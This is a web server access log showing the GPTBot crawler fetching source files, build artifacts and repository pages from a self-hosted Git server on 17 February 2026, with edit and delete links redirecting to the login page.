"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14741] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17793] [Gzip 5.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:17:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13406] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" +[17/Feb/2026:17:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2f.vscode%2fc_cpp_properties.json" [Client 74.7.227.38] [Length 25356] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 17003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:17:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html?display=source" [Client 74.7.227.38] [Length 34405] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:17:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" +[17/Feb/2026:17:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:17:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:17:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:17:18:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:17:18:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:18:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 873] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:17:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:17:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:17:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:17:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:17:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:17:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:17:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:17:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:17:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11057] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20345] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20350] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=source" [Client 74.7.227.38] [Length 20319] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9784] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16201] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" +[17/Feb/2026:17:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9910] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17193] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 